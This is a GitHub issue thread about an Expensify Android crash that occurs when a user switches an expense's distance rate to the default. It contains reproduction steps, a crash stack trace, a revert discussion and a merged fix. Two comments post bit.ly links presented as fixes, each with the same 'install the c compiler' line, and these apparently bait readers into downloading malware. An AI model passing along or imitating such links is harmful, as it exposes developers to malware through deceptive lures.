### ISSUE TITLE
Distance rates - Change Rate to default leads to app crash

### ISSUE THREAD

**Issue by IuliiaHerets** [Expensify/App#49459]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** v9.0.38-0
**Reproducible in staging?:** Y
**Reproducible in production?:** N
**Issue was found when executing this PR:** https://github.com/Expensify/App/pull/49194
**Email or phone of affected tester (no customers):** applausetester+bp0911del@app;ause.expensifail.com
**Issue reported by:** Applause Internal Team

## Action Performed:
Preconditions:
1. Track tax is enabled.
2. Workspace has at least two distance rates that have tax rate and tax reclaimable on
3. Each distance rate has different tax rate

Steps to reproduce:
1. Go to ws chat > Submit expense
2. Choose Distance > enter waypoints
3. Submit expense
4. Go to expense details > click on Rate
5. Choose Default Rate (0,67 / mile)

## Expected Result:
User is navigated to expense details page. Chosen rate is displayed.

## Actual Result:
Android app: application crashes

Web/mWeb/Desktop app: user stays on Rate tab. Default Rate is checked, but previous rate is highlighted. User need to click/tap on default rate again.
## Workaround:
Unknown

## Platforms:

- [x] Android: Native
- [ ] Android: mWeb Chrome
- [ ] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

[1909_2.txt](https://github.com/user-attachments/files/17058168/1909_2.txt)

https://github.com/user-attachments/assets/98e72270-92f8-4a36-85ec-d31523fbf35f

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

**Comment by abhisharma9876** [comment]
I think this will help you.
https://bit.ly/4gwC82r

you may need to install the c compiler

**Comment by aroopcodder** [comment]
try this

https://bit.ly/4eugCty

you may need to install the c compiler

**Comment by IuliiaHerets** [comment]
We think that this bug might be related to #vip-bills

**Comment by dylanexpensify** [comment]
reviewing

**Comment by grgia** [comment]
https://expensify.slack.com/archives/C01GTK53T8Q/p1726745325381519

**Comment by mountiny** [comment]
definitely related to this firebase crash https://console.firebase.google.com/u/0/project/expensify-chat/crashlytics/app/android:com.expensify.chat/issues/022302da0d55dfb152b0c7d7d51a24a7?time=last-seven-days&types=crash&versions=9.0.38-0%20(1009003800)&sessionEventKey=66EC079701C80001114740D23489E14D_1994770182356551182

**Comment by carlosmiceli** [comment]
@Krishna2323 @aimane-chnaif Can you look into this?

**Comment by carlosmiceli** [comment]
@mountiny This would qualify as revert-worthy if we don't solve it soon, right?

**Comment by carlosmiceli** [comment]
These are the firebase crash logs:

```
Fatal Exception: com.facebook.react.common.JavascriptException: TypeError: Cannot read property 'value' of undefined, js engine: hermes, stack:
getModifiedExpenseOriginalMessage@1:2641368
buildOptimisticModifiedExpenseReportAction@1:2657263
getUpdateMoneyRequestParams@1:2928286
updateMoneyRequestDistanceRate@1:2935771
selectDistanceRate@1:6750319
t12@1:6750366
selectRow@1:5374828
anonymous@1:5376736
anonymous@1:4219664
onSelectRow@1:5376708
onPress@1:4199364
t23@1:4218512
anonymous@1:4219664
_performTransitionSideEffects@1:791974
_receiveSignal@1:791562
onResponderRelease@1:790391
executeDispatch@1:1250761
executeDispatchesAndReleaseTopLevel@1:1256047
forEachAccumulated@1:1252277
anonymous@1:1256485
batchedUpdatesImpl@1:1317425
batchedUpdates$1@1:1255971
dispatchEvent@1:1256250

       at com.facebook.react.modules.core.ExceptionsManagerModule.reportException(ExceptionsManagerModule.java:65)
       at com.facebook.jni.NativeRunnable.run(NativeRunnable.java)
       at android.os.Handler.handleCallback(Handler.java:958)
       at android.os.Handler.dispatchMessage(Handler.java:99)
       at com.facebook.react.bridge.queue.MessageQueueThreadHandler.dispatchMessage(MessageQueueThreadHandler.java:27)
       at android.os.Looper.loopOnce(Looper.java:205)
       at android.os.Looper.loop(Looper.java:294)
       at com.facebook.react.bridge.queue.MessageQueueThreadImpl$4.run(MessageQueueThreadImpl.java:235)
       at java.lang.Thread.run(Thread.java:1012)
```

**Comment by mountiny** [comment]
@carlosmiceli yes probably worth to revert https://github.com/Expensify/App/pull/49194

**Comment by grgia** [comment]
@Krishna2323 yes, could you please raise a PR?

**Comment by carlosmiceli** [comment]
PR [fix](https://github.com/Expensify/App/pull/49475) is now merged, thanks @Krishna2323 !

**Comment by carlosmiceli** [comment]
@dylanexpensify this is in prod already, can we close?
